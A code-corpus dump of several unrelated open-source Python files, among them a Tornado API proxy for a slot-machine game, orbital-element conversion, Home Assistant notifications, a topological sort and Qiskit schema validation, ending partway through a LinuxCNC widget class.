alejandrobernardis/python-slot-machines | src/backend/backend/api/public/services.py | 1 | 3062 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Asumi Kamikaze Inc.
# Licensed under the MIT License.
# Author: Alejandro M. Bernardis
# Email: alejandro (dot) bernardis (at) asumikamikaze (dot) com
# Created: 02/Oct/2014 2:46 PM
from backend.api.base import BaseHandler
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPRequest
class ServiceHandler(BaseHandler):
def _get_url(self, with_domain=True):
url = '/s' + self.request.uri
if with_domain:
url = self.api_domain('http') + url
return url
@gen.coroutine
def _set_request(self):
response = None
try:
request = HTTPRequest(self._get_url())
request.method = self.request.method
request.headers = self.request.headers
if self.request.method in ("POST", "DELETE", "PATCH", "PUT"):
request.body = self.request.body
response = yield AsyncHTTPClient().fetch(request)
self.write(response.body)
except Exception, e:
self.get_json_exception_response_and_finish(e)
raise gen.Return(response)
def prepare(self):
self.set_header_for_json()
def compute_etag(self):
return None
@gen.coroutine
def head(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def get(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def post(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def delete(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def patch(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def put(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def options(self, *args, **kwargs):
yield self._set_request()
handlers_list = [
(r'/sign/in(?P<uid>\/[a-z0-9]+)?/?', ServiceHandler),
(r'/sign/out/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/find_golden_eggs/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/roulette/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/slot/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/android/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/ios/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/media/nags/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/sync/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/request/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/invite/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/notifications/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/share/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/balance/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/slots/(?P<sid>[a-z0-9]+)/?', ServiceHandler)
]
| mit | -3,224,450,806,062,539,300 | 33.022222 | 73 | 0.59177 | false |
lasr/orbital_elements | convert/meeEl_meefl.py | 1 | 1858 | import numpy as np
__author__ = "Nathan I. Budd"
__email__ = "[email protected]"
__copyright__ = "Copyright 2017, LASR Lab"
__license__ = "MIT"
__version__ = "0.1"
__status__ = "Production"
__date__ = "08 Mar 2017"
def meeEl_meefl(meefl):
"""Convert MEEs with true longitude to eccentric longitude.
Args:
meefl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, fl), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
fl = true longitude
Returns:
meeEl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, El), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
El = eccentric longitude
"""
f = meefl[:, 1:2]
g = meefl[:, 2:3]
fl = meefl[:, 5:6]
e = (f**2 + g**2)**.5
B = ((1 + e) / (1 - e))**.5
tan_wbar_by_2 = ((e - f) / (e + f))**0.5
tan_fl_by_2 = np.tan(fl/2)
tan_E_by_2 = 1/B * ((tan_fl_by_2 - tan_wbar_by_2) /
(1 + tan_fl_by_2 * tan_wbar_by_2))
tan_El_by_2 = ((tan_E_by_2 + tan_wbar_by_2) /
(1 - tan_E_by_2 * tan_wbar_by_2))
El = np.mod((2*np.arctan(tan_El_by_2)), 2*np.pi)
return np.concatenate((meefl[:, 0:5], El), axis=1)
| mit | 7,915,249,333,846,053,000 | 35.431373 | 77 | 0.55436 | false |
beni55/djangolint | project/lint/migrations/0002_auto__add_fix.py | 2 | 2293 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Fix'
db.create_table('lint_fix', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('report', self.gf('django.db.models.fields.related.ForeignKey')(related_name='fixes', to=orm['lint.Report'])),
('path', self.gf('django.db.models.fields.CharField')(max_length=255)),
('line', self.gf('django.db.models.fields.PositiveIntegerField')()),
('source', self.gf('django.db.models.fields.TextField')()),
('error', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('lint', ['Fix'])
def backwards(self, orm):
# Deleting model 'Fix'
db.delete_table('lint_fix')
models = {
'lint.fix': {
'Meta': {'object_name': 'Fix'},
'error': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.PositiveIntegerField', [], {}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'report': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fixes'", 'to': "orm['lint.Report']"}),
'source': ('django.db.models.fields.TextField', [], {})
},
'lint.report': {
'Meta': {'ordering': "['-created']", 'object_name': 'Report'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stage': ('django.db.models.fields.CharField', [], {'default': "'waiting'", 'max_length': '10'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['lint']
| isc | 781,272,958,794,556,400 | 44.86 | 130 | 0.549935 | false |
fbradyirl/home-assistant | homeassistant/components/persistent_notification/__init__.py | 1 | 6944 | """Support for displaying persistent notifications."""
from collections import OrderedDict
import logging
from typing import Awaitable
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
ATTR_CREATED_AT = "created_at"
ATTR_MESSAGE = "message"
ATTR_NOTIFICATION_ID = "notification_id"
ATTR_TITLE = "title"
ATTR_STATUS = "status"
DOMAIN = "persistent_notification"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
EVENT_PERSISTENT_NOTIFICATIONS_UPDATED = "persistent_notifications_updated"
SERVICE_CREATE = "create"
SERVICE_DISMISS = "dismiss"
SERVICE_MARK_READ = "mark_read"
SCHEMA_SERVICE_CREATE = vol.Schema(
{
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_TITLE): cv.template,
vol.Optional(ATTR_NOTIFICATION_ID): cv.string,
}
)
SCHEMA_SERVICE_DISMISS = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
SCHEMA_SERVICE_MARK_READ = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
DEFAULT_OBJECT_ID = "notification"
_LOGGER = logging.getLogger(__name__)
STATE = "notifying"
STATUS_UNREAD = "unread"
STATUS_READ = "read"
WS_TYPE_GET_NOTIFICATIONS = "persistent_notification/get"
SCHEMA_WS_GET = websocket_api.BASE_COMMAND_MESSAGE_SCHEMA.extend(
{vol.Required("type"): WS_TYPE_GET_NOTIFICATIONS}
)
@bind_hass
def create(hass, message, title=None, notification_id=None):
"""Generate a notification."""
hass.add_job(async_create, hass, message, title, notification_id)
@bind_hass
def dismiss(hass, notification_id):
"""Remove a notification."""
hass.add_job(async_dismiss, hass, notification_id)
@callback
@bind_hass
def async_create(
hass: HomeAssistant, message: str, title: str = None, notification_id: str = None
) -> None:
"""Generate a notification."""
data = {
key: value
for key, value in [
(ATTR_TITLE, title),
(ATTR_MESSAGE, message),
(ATTR_NOTIFICATION_ID, notification_id),
]
if value is not None
}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_CREATE, data))
@callback
@bind_hass
def async_dismiss(hass: HomeAssistant, notification_id: str) -> None:
"""Remove a notification."""
data = {ATTR_NOTIFICATION_ID: notification_id}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_DISMISS, data))
async def async_setup(hass: HomeAssistant, config: dict) -> Awaitable[bool]:
"""Set up the persistent notification component."""
persistent_notifications = OrderedDict()
hass.data[DOMAIN] = {"notifications": persistent_notifications}
@callback
def create_service(call):
"""Handle a create notification service call."""
title = call.data.get(ATTR_TITLE)
message = call.data.get(ATTR_MESSAGE)
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
if notification_id is not None:
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
else:
entity_id = async_generate_entity_id(
ENTITY_ID_FORMAT, DEFAULT_OBJECT_ID, hass=hass
)
notification_id = entity_id.split(".")[1]
attr = {}
if title is not None:
try:
title.hass = hass
title = title.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering title %s: %s", title, ex)
title = title.template
attr[ATTR_TITLE] = title
try:
message.hass = hass
message = message.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering message %s: %s", message, ex)
message = message.template
attr[ATTR_MESSAGE] = message
hass.states.async_set(entity_id, STATE, attr)
# Store notification and fire event
# This will eventually replace state machine storage
persistent_notifications[entity_id] = {
ATTR_MESSAGE: message,
ATTR_NOTIFICATION_ID: notification_id,
ATTR_STATUS: STATUS_UNREAD,
ATTR_TITLE: title,
ATTR_CREATED_AT: dt_util.utcnow(),
}
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def dismiss_service(call):
"""Handle the dismiss notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
return
hass.states.async_remove(entity_id)
del persistent_notifications[entity_id]
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def mark_read_service(call):
"""Handle the mark_read notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
_LOGGER.error(
"Marking persistent_notification read failed: "
"Notification ID %s not found.",
notification_id,
)
return
persistent_notifications[entity_id][ATTR_STATUS] = STATUS_READ
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
hass.services.async_register(
DOMAIN, SERVICE_CREATE, create_service, SCHEMA_SERVICE_CREATE
)
hass.services.async_register(
DOMAIN, SERVICE_DISMISS, dismiss_service, SCHEMA_SERVICE_DISMISS
)
hass.services.async_register(
DOMAIN, SERVICE_MARK_READ, mark_read_service, SCHEMA_SERVICE_MARK_READ
)
hass.components.websocket_api.async_register_command(
WS_TYPE_GET_NOTIFICATIONS, websocket_get_notifications, SCHEMA_WS_GET
)
return True
@callback
def websocket_get_notifications(
hass: HomeAssistant, connection: websocket_api.ActiveConnection, msg
):
"""Return a list of persistent_notifications."""
connection.send_message(
websocket_api.result_message(
msg["id"],
[
{
key: data[key]
for key in (
ATTR_NOTIFICATION_ID,
ATTR_MESSAGE,
ATTR_STATUS,
ATTR_TITLE,
ATTR_CREATED_AT,
)
}
for data in hass.data[DOMAIN]["notifications"].values()
],
)
)
| apache-2.0 | 7,887,698,443,924,102,000 | 30 | 86 | 0.639401 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/util/topsort.py | 1 | 7495 | """
Topological sort.
From Tim Peters, see:
http://mail.python.org/pipermail/python-list/1999-July/006660.html
topsort takes a list of pairs, where each pair (x, y) is taken to
mean that x <= y wrt some abstract partial ordering. The return
value is a list, representing a total ordering that respects all
the input constraints.
E.g.,
topsort( [(1,2), (3,3)] )
Valid topological sorts would be any of (but nothing other than)
[3, 1, 2]
[1, 3, 2]
[1, 2, 3]
... however this variant ensures that 'key' order (first element of
tuple) is preserved so the following will be result returned:
[1, 3, 2]
because those are the permutations of the input elements that
respect the "1 precedes 2" and "3 precedes 3" input constraints.
Note that a constraint of the form (x, x) is really just a trick
to make sure x appears *somewhere* in the output list.
If there's a cycle in the constraints, say
topsort( [(1,2), (2,1)] )
then CycleError is raised, and the exception object supports
many methods to help analyze and break the cycles. This requires
a good deal more code than topsort itself!
"""
from galaxy.util.odict import odict as OrderedDict
from exceptions import Exception
class CycleError(Exception):
def __init__(self, sofar, numpreds, succs):
Exception.__init__(self, "cycle in constraints",
sofar, numpreds, succs)
self.preds = None
# return as much of the total ordering as topsort was able to
# find before it hit a cycle
def get_partial(self):
return self[1]
# return remaining elt -> count of predecessors map
def get_pred_counts(self):
return self[2]
# return remaining elt -> list of successors map
def get_succs(self):
return self[3]
# return remaining elements (== those that don't appear in
# get_partial())
def get_elements(self):
return self.get_pred_counts().keys()
# Return a list of pairs representing the full state of what's
# remaining (if you pass this list back to topsort, it will raise
# CycleError again, and if you invoke get_pairlist on *that*
# exception object, the result will be isomorphic to *this*
# invocation of get_pairlist).
# The idea is that you can use pick_a_cycle to find a cycle,
# through some means or another pick an (x,y) pair in the cycle
# you no longer want to respect, then remove that pair from the
# output of get_pairlist and try topsort again.
def get_pairlist(self):
succs = self.get_succs()
answer = []
for x in self.get_elements():
if succs.has_key(x):
for y in succs[x]:
answer.append( (x, y) )
else:
# make sure x appears in topsort's output!
answer.append( (x, x) )
return answer
# return remaining elt -> list of predecessors map
def get_preds(self):
if self.preds is not None:
return self.preds
self.preds = preds = OrderedDict()
remaining_elts = self.get_elements()
for x in remaining_elts:
preds[x] = []
succs = self.get_succs()
for x in remaining_elts:
if succs.has_key(x):
for y in succs[x]:
preds[y].append(x)
if __debug__:
for x in remaining_elts:
assert len(preds[x]) > 0
return preds
# return a cycle [x, ..., x] at random
def pick_a_cycle(self):
remaining_elts = self.get_elements()
# We know that everything in remaining_elts has a predecessor,
# but don't know that everything in it has a successor. So
# crawling forward over succs may hit a dead end. Instead we
# crawl backward over the preds until we hit a duplicate, then
# reverse the path.
preds = self.get_preds()
from random import choice
x = choice(remaining_elts)
answer = []
index = OrderedDict()
in_answer = index.has_key
while not in_answer(x):
index[x] = len(answer) # index of x in answer
answer.append(x)
x = choice(preds[x])
answer.append(x)
answer = answer[index[x]:]
answer.reverse()
return answer
def topsort(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
# suck up everything without a predecessor
answer = filter(lambda x, numpreds=numpreds: numpreds[x] == 0,
numpreds.keys())
# for everything in answer, knock down the pred count on
# its successors; note that answer grows *in* the loop
for x in answer:
assert numpreds[x] == 0
del numpreds[x]
if successors.has_key(x):
for y in successors[x]:
numpreds[y] = numpreds[y] - 1
if numpreds[y] == 0:
answer.append(y)
# following "del" isn't needed; just makes
# CycleError details easier to grasp
del successors[x]
if numpreds:
# everything in numpreds has at least one predecessor ->
# there's a cycle
if __debug__:
for x in numpreds.keys():
assert numpreds[x] > 0
raise CycleError(answer, numpreds, successors)
return answer
def topsort_levels(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
answer = []
while 1:
# Suck up everything without a predecessor.
levparents = [x for x in numpreds.keys() if numpreds[x] == 0]
if not levparents:
break
answer.append( levparents )
for levparent in levparents:
del numpreds[levparent]
if successors.has_key(levparent):
for levparentsucc in successors[levparent]:
numpreds[levparentsucc] -= 1
del successors[levparent]
if numpreds:
# Everything in num_parents has at least one child ->
# there's a cycle.
raise CycleError( answer, numpreds, successors )
return answer
| gpl-3.0 | -1,747,945,830,861,587,700 | 32.311111 | 70 | 0.598799 | false |
QISKit/qiskit-sdk-py | qiskit/validation/jsonschema/schema_validation.py | 1 | 7210 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Validation module for validation against JSON schemas."""
import json
import os
import logging
import jsonschema
from .exceptions import SchemaValidationError, _SummaryValidationError
logger = logging.getLogger(__name__)
_DEFAULT_SCHEMA_PATHS = {
'backend_configuration': 'schemas/backend_configuration_schema.json',
'backend_properties': 'schemas/backend_properties_schema.json',
'backend_status': 'schemas/backend_status_schema.json',
'default_pulse_configuration': 'schemas/default_pulse_configuration_schema.json',
'job_status': 'schemas/job_status_schema.json',
'qobj': 'schemas/qobj_schema.json',
'result': 'schemas/result_schema.json'}
# Schema and Validator storage
_SCHEMAS = {}
_VALIDATORS = {}
def _load_schema(file_path, name=None):
"""Loads the QObj schema for use in future validations.
Caches schema in _SCHEMAS module attribute.
Args:
file_path(str): Path to schema.
name(str): Given name for schema. Defaults to file_path filename
without schema.
Return:
schema(dict): Loaded schema.
"""
if name is None:
# filename without extension
name = os.path.splitext(os.path.basename(file_path))[0]
if name not in _SCHEMAS:
with open(file_path, 'r') as schema_file:
_SCHEMAS[name] = json.load(schema_file)
return _SCHEMAS[name]
def _get_validator(name, schema=None, check_schema=True,
validator_class=None, **validator_kwargs):
"""Generate validator for JSON schema.
Args:
name (str): Name for validator. Will be validator key in
`_VALIDATORS` dict.
schema (dict): JSON schema `dict`. If not provided searches for schema
in `_SCHEMAS`.
check_schema (bool): Verify schema is valid.
validator_class (jsonschema.IValidator): jsonschema IValidator instance.
Default behavior is to determine this from the schema `$schema`
field.
**validator_kwargs: Additional keyword arguments for validator.
Return:
jsonschema.IValidator: Validator for JSON schema.
Raises:
SchemaValidationError: Raised if validation fails.
"""
if schema is None:
try:
schema = _SCHEMAS[name]
except KeyError:
raise SchemaValidationError("Valid schema name or schema must "
"be provided.")
if name not in _VALIDATORS:
# Resolve JSON spec from schema if needed
if validator_class is None:
validator_class = jsonschema.validators.validator_for(schema)
# Generate and store validator in _VALIDATORS
_VALIDATORS[name] = validator_class(schema, **validator_kwargs)
if check_schema:
_VALIDATORS[name].check_schema(schema)
validator = _VALIDATORS[name]
return validator
def _load_schemas_and_validators():
"""Load all default schemas into `_SCHEMAS`."""
schema_base_path = os.path.join(os.path.dirname(__file__), '../..')
for name, path in _DEFAULT_SCHEMA_PATHS.items():
_load_schema(os.path.join(schema_base_path, path), name)
_get_validator(name)
# Load all schemas on import
_load_schemas_and_validators()
def validate_json_against_schema(json_dict, schema,
err_msg=None):
"""Validates JSON dict against a schema.
Args:
json_dict (dict): JSON to be validated.
schema (dict or str): JSON schema dictionary or the name of one of the
standards schemas in Qiskit to validate against it. The list of
standard schemas is: ``backend_configuration``,
``backend_properties``, ``backend_status``,
``default_pulse_configuration``, ``job_status``, ``qobj``,
``result``.
err_msg (str): Optional error message.
Raises:
SchemaValidationError: Raised if validation fails.
"""
try:
if isinstance(schema, str):
schema_name = schema
schema = _SCHEMAS[schema_name]
validator = _get_validator(schema_name)
validator.validate(json_dict)
else:
jsonschema.validate(json_dict, schema)
except jsonschema.ValidationError as err:
if err_msg is None:
err_msg = "JSON failed validation. Set Qiskit log level to DEBUG " \
"for further information."
newerr = SchemaValidationError(err_msg)
newerr.__cause__ = _SummaryValidationError(err)
logger.debug('%s', _format_causes(err))
raise newerr
def _format_causes(err, level=0):
"""Return a cascading explanation of the validation error.
Returns a cascading explanation of the validation error in the form of::
<validator> failed @ <subfield_path> because of:
<validator> failed @ <subfield_path> because of:
...
<validator> failed @ <subfield_path> because of:
...
...
For example::
'oneOf' failed @ '<root>' because of:
'required' failed @ '<root>.config' because of:
'meas_level' is a required property
Meaning the validator 'oneOf' failed while validating the whole object
because of the validator 'required' failing while validating the property
'config' because its 'meas_level' field is missing.
The cascade repeats the format "<validator> failed @ <path> because of"
until there are no deeper causes. In this case, the string representation
of the error is shown.
Args:
err (jsonschema.ValidationError): the instance to explain.
level (int): starting level of indentation for the cascade of
explanations.
Return:
str: a formatted string with the explanation of the error.
"""
lines = []
def _print(string, offset=0):
lines.append(_pad(string, offset=offset))
def _pad(string, offset=0):
padding = ' ' * (level + offset)
padded_lines = [padding + line for line in string.split('\n')]
return '\n'.join(padded_lines)
def _format_path(path):
def _format(item):
if isinstance(item, str):
return '.{}'.format(item)
return '[{}]'.format(item)
return ''.join(['<root>'] + list(map(_format, path)))
_print('\'{}\' failed @ \'{}\' because of:'.format(
err.validator, _format_path(err.absolute_path)))
if not err.context:
_print(str(err.message), offset=1)
else:
for suberr in err.context:
lines.append(_format_causes(suberr, level+1))
return '\n'.join(lines)
| apache-2.0 | 3,412,556,992,353,730,600 | 32.534884 | 85 | 0.629681 | false |
crscardellino/thesis | thesis/scripts/unlabeled_corpora_meta.py | 1 | 1429 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
from functools import partial
from multiprocessing import Pool
from tabulate import tabulate
from thesis.utils import find
def process_file(ifile, meta):
print('Processing %s' % ifile, file=sys.stderr)
basename = os.path.basename(ifile)
ofile = os.path.join(args.output, basename)
with open(ifile, 'r') as fin, open(ofile, 'w') as fout:
sentence = []
sentences = 0
for line in fin:
line = line.strip().split()
if not line and sentence:
print('META:%s sentence:%05d file:%s words:%03d'
% (meta, sentences, basename, len(sentence)), file=fout)
print(tabulate(sentence, tablefmt='plain'), end='\n\n', file=fout)
sentence = []
sentences += 1
elif line:
sentence.append(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
parser.add_argument('meta')
parser.add_argument('--pattern', default='*')
parser.add_argument('--workers', type=int, default=12)
args = parser.parse_args()
with Pool(args.workers) as p:
p.map(partial(process_file, meta=args.meta), find(args.input, args.pattern))
| mit | -7,308,446,227,549,357,000 | 28.163265 | 84 | 0.604619 | false |
maxspad/MGrader | autograder/modules/questions/PythonQuestion.py | 1 | 2436 | '''
Contains the PythonQuestion class, which is an instructor-facing
question type that implements a grade() function.
All instructor-facing Question modules must implement
a grade() function at module level that returns a Result object.
@author: Max Spadafore
'''
from AbstractQuestion import AbstractQ
table_name = 'grades_python'
f_uname = 'uname'
f_ptspos = 'ptspos'
f_ptsrec = 'ptsrec'
f_timestamp = 'timestamp_unix'
TABLE_CREATE = '''CREATE TABLE {0}
({1} TEXT PRIMARY KEY NOT NULL,
{2} INTEGER NOT NULL,
{3} INTEGER NOT NULL,
{4} INTEGER NOT NULL)'''.format(table_name, f_uname, f_ptspos, f_ptsrec, f_timestamp)
def initialize():
'''import autograder.modules.Database as dbm
db = dbm.DAL(connect=True)
db.createTable(TABLE_CREATE)
db.disconnect()'''
def process_cmd(cmdstr, args):
raise NotImplementedError
def grade(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=None, target=None):
'''
Called by the GSM after dynamic import. Takes its parameters, acts on them if it wishes, and passes them along to the
CPPQuestion class, which handles them. It then calls the CPPQuestion grade() function and returns its Result object.
@return: The Result object representing the result of the question's grading.
'''
question = PythonQ(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=makefile, maketarget=target)
return question.grade()
class PythonQ(AbstractQ):
'''
An instructor-facing Question grading class designed to grade python programs.
Utilizes functions from AbstractQ
@see: AbstractQ
'''
def grade(self):
# move to student dir
self.chdirToStudent()
# Run (AbstractQuestion)
self.openFiles('student')
result = self.runStudentCode()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
self.chdirToInstructor()
self.openFiles('instructor')
self.runInstructorCode()
result = self.compareOutputs()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
return self.passStudent()
def getQType(self):
return 'PythonQuestion' | bsd-3-clause | 555,966,247,296,795,100 | 31.932432 | 149 | 0.688013 | false |
siggame/webserver | webserver/hermes/templatetags/hermes_tags.py | 1 | 3396 | from django import template
from django.template.defaultfilters import stringfilter
from competition.models.game_model import Game
import slumber
import datetime
import logging
import requests
logger = logging.getLogger(__name__)
register = template.Library()
@register.filter
@stringfilter
def iso_to_datetime(value):
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")
except ValueError:
pass
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
return ""
@register.assignment_tag
def centered_list(value, center=None, size=None):
if size is None or center is None:
return value
if len(value) == 0:
return value
size = int(size)
start = center - size / 2 - 1
stop = center + size / 2
if start < 0:
stop = size
start = 0
if stop >= len(value):
start = len(value) - size
stop = len(value)
return value[start:stop]
class CheckEmbargoedNode(template.Node):
def __init__(self, team, variable_name):
self.team = team
self.variable_name = variable_name
def render(self, context):
team = context[self.team]
try:
# Get the last game played
last_game = team.game_set.latest()
# Grab the API url from the last Game that was played
url = last_game.data['api_url']
# Query API
response = slumber.API(url).client.get(name=team.slug)
# Make sure that we only get one client item back.
assert response['meta']['total_count'] == 1
# Get "embargoed" from returned client
if response['objects'][0]['embargoed']:
result = "embargoed"
else:
result = "unembargoed"
except Game.DoesNotExist:
result = "not ready"
except slumber.exceptions.ImproperlyConfigured:
result = "error"
logger.error("Bad arena URL: {}".format(url))
except (TypeError, KeyError), e:
result = "error"
logger.error("Error grabbing game data: {}".format(str(e)))
except slumber.exceptions.HttpClientError:
result = "error"
logger.error("Couldn't connect to arena api ({})".format(url))
except slumber.exceptions.HttpServerError:
result = "error"
logger.error("Arena server error ({})".format(url))
except requests.exceptions.ConnectionError:
result = "error"
logger.error("Connection to arena api timed out ({})".format(url))
except AssertionError:
result = "error"
if response['meta']['total_count'] > 1:
msg = 'Found more than one team with slug "{}" in arena'
else:
msg = 'Found zero teams with slug "{}" in arena'
logger.error(msg.format(team.slug))
context[self.variable_name] = result
return ""
@register.tag
def check_embargoed(parser, token):
try:
tag_name, team, _as, variable = token.split_contents()
except ValueError:
tag_name = token.contents.split()[0]
msg = '{0} should be "{0} <team> as <variable>"'
raise template.TemplateSyntaxError(msg.format(tag_name))
return CheckEmbargoedNode(team, variable)
| bsd-3-clause | -4,488,372,421,264,011,300 | 29.594595 | 78 | 0.5904 | false |
ianmcmahon/linuxcnc-mirror | lib/python/gladevcp/hal_gremlin.py | 1 | 9842 | #!/usr/bin/env python
# vim: sts=4 sw=4 et
# GladeVcp Widgets
#
# Copyright (c) 2010 Pavel Shramov <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os
import gtk, gobject
import linuxcnc
import gremlin
import rs274.glcanon
import gcode
from hal_actions import _EMC_ActionBase
from hal_glib import GStat
class HAL_Gremlin(gremlin.Gremlin, _EMC_ActionBase):
__gtype_name__ = "HAL_Gremlin"
__gproperties__ = {
'view' : ( gobject.TYPE_STRING, 'View type', 'Default view: p, x, y, y2, z, z2',
'p', gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'enable_dro' : ( gobject.TYPE_BOOLEAN, 'Enable DRO', 'Show DRO on graphics',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'metric_units' : ( gobject.TYPE_BOOLEAN, 'Use Metric Units', 'Show DRO in metric or imperial units',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_relative' : ( gobject.TYPE_BOOLEAN, 'Show Relative', 'Show DRO relative to active system or machine origin',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_commanded' : ( gobject.TYPE_BOOLEAN, 'Show Commanded', 'Show commanded or actual position',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_extents_option' : ( gobject.TYPE_BOOLEAN, 'Show Extents', 'Show machine extents',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_limits' : ( gobject.TYPE_BOOLEAN, 'Show limits', 'Show machine limits',
